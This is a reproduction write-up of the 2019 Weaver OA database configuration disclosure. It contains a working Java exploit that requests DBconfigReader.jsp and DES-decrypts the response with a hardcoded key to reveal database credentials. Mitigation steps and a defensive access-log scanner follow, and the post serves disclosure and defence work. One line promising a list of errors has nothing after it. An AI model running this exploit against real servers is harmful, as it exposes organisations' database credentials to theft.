
Reproducing the Weaver OA (泛微) Database (MSSQL) Configuration Disclosure Vulnerability

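0x00 Overview

In October 2019, a database (MSSQL) configuration disclosure vulnerability in Weaver OA was made public. An attacker can request the vulnerable page DBconfigReader.jsp and decrypt the returned content to obtain the database configuration in plaintext.

Affected versions include, but are not limited to, 8.0 and 9.0.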

 

0x01 Reproducing the vulnerability

Using ecologyexp.jar

 

package com;

import org.apache.http.HttpEntity;
import org.apache.http.client.methods.CloseableHttpResponse;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClientBuilder;
import org.apache.http.util.EntityUtils;

import javax.crypto.Cipher;
import javax.crypto.SecretKey;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.DESKeySpec;
import java.security.SecureRandom;

public class ReadDbConfig {
    private final static String DES = "DES";
    // DES key used by the PoC; DESKeySpec reads only its first 8 bytes
    private final static String key = "1z2x3c4v5b6n";

    public static void main(String[] args) throws Exception {
        // Check args.length first so a missing argument prints the usage line instead of throwing
        if (args.length > 0 && args[0] != null && args[0].length() != 0) {
            String url = args[0] + "/mobile/DBconfigReader.jsp";
            System.out.println(ReadConfig(url));
        } else {
            System.err.print("use: java -jar ecologyExp  http://127.0.0.1");
        }
    }

    private static String ReadConfig(String url) throws Exception {
        HttpGet httpGet = new HttpGet(url);
        // try-with-resources closes the client and the response
        try (CloseableHttpClient httpClient = HttpClientBuilder.create().build();
             CloseableHttpResponse response = httpClient.execute(httpGet)) {
            HttpEntity responseEntity = response.getEntity();
            byte[] res1 = EntityUtils.toByteArray(responseEntity);
            // Drop the first 10 bytes of the response body; the remainder is passed to DES
            byte[] data = subBytes(res1, 10, res1.length - 10);
            byte[] finaldata = decrypt(data, key.getBytes());
            return (new String(finaldata));
        }
    }

    private static byte[] decrypt(byte[] data, byte[] key) throws Exception {
        SecureRandom sr = new SecureRandom();
        DESKeySpec dks = new DESKeySpec(key);
        SecretKeyFactory keyFactory = SecretKeyFactory.getInstance(DES);
        SecretKey securekey = keyFactory.generateSecret(dks);
        Cipher cipher = Cipher.getInstance(DES);
        cipher.init(Cipher.DECRYPT_MODE, securekey, sr);
        return cipher.doFinal(data);
    }

    // Copy count bytes of src, starting at offset begin, into a new array
    public static byte[] subBytes(byte[] src, int begin, int count) {
        byte[] bs = new byte[count];
        System.arraycopy(src, begin, bs, 0, count);
        return bs;
    }
}

 

Two kinds of errors may occur

0x02 Mitigation

1. Block access to DBconfigReader.jsp

2. Apply the patch

https://www.weaver.com.cn/cs/package/JDK/Ecology_security_DB_20191024.zip
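
To check whether the page was already requested before it was blocked or patched, the access logs can be searched for it. The following is an added example, not part of the original post: it assumes combined-format web server access logs, normalizes each request path (percent-encoding, letter case, `;` path parameters, dot segments) before comparing it with /mobile/DBconfigReader.jsp, and runs on constructed sample lines. The function names and the "served"/"not-served" labels are illustrative.

```python
import re
from urllib.parse import unquote, urlsplit

# Combined-log-format fields needed here: client, request target, status, body size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)')
TARGET = "/mobile/dbconfigreader.jsp"

def normalize_path(target):
    """Reduce a request target to a canonical lower-case path for matching."""
    path = urlsplit(target).path            # strips the query string
    for _ in range(2):                      # undo single and double percent-encoding
        path = unquote(path)
    out = []
    for seg in path.replace("\\", "/").split("/"):
        seg = seg.split(";", 1)[0]          # drop ;jsessionid=... style path parameters
        if seg == "..":
            out = out[:-1]
        elif seg not in ("", "."):
            out.append(seg)
    return "/" + "/".join(out).lower()

def scan(lines):
    """Return (ip, status, verdict) for every request aimed at the page."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or normalize_path(m["target"]) != TARGET:
            continue
        status = int(m["status"])
        size = 0 if m["size"] == "-" else int(m["size"])
        # A 2xx response with a body means the encrypted configuration was returned.
        verdict = "served" if 200 <= status < 300 and size > 0 else "not-served"
        hits.append((m["ip"], status, verdict))
    return hits

# Constructed sample lines (documentation-range addresses), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [25/Oct/2019:10:01:02 +0800] "GET /mobile/DBconfigReader.jsp HTTP/1.1" 200 266',
    '203.0.113.7 - - [25/Oct/2019:10:01:09 +0800] "GET /mobile/%44BconfigReader.jsp;x=1 HTTP/1.1" 200 266',
    '198.51.100.4 - - [26/Oct/2019:08:30:00 +0800] "GET /mobile/dbconfigreader.jsp HTTP/1.1" 403 0',
    '198.51.100.9 - - [26/Oct/2019:08:31:00 +0800] "GET /mobile/login.jsp HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

Any "served" hit means the database credentials in the configuration should be treated as exposed and changed, in addition to blocking the page and applying the patch.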

 

0x03 References

https://blog.csdn.net/sun1318578251/article/details/102760378
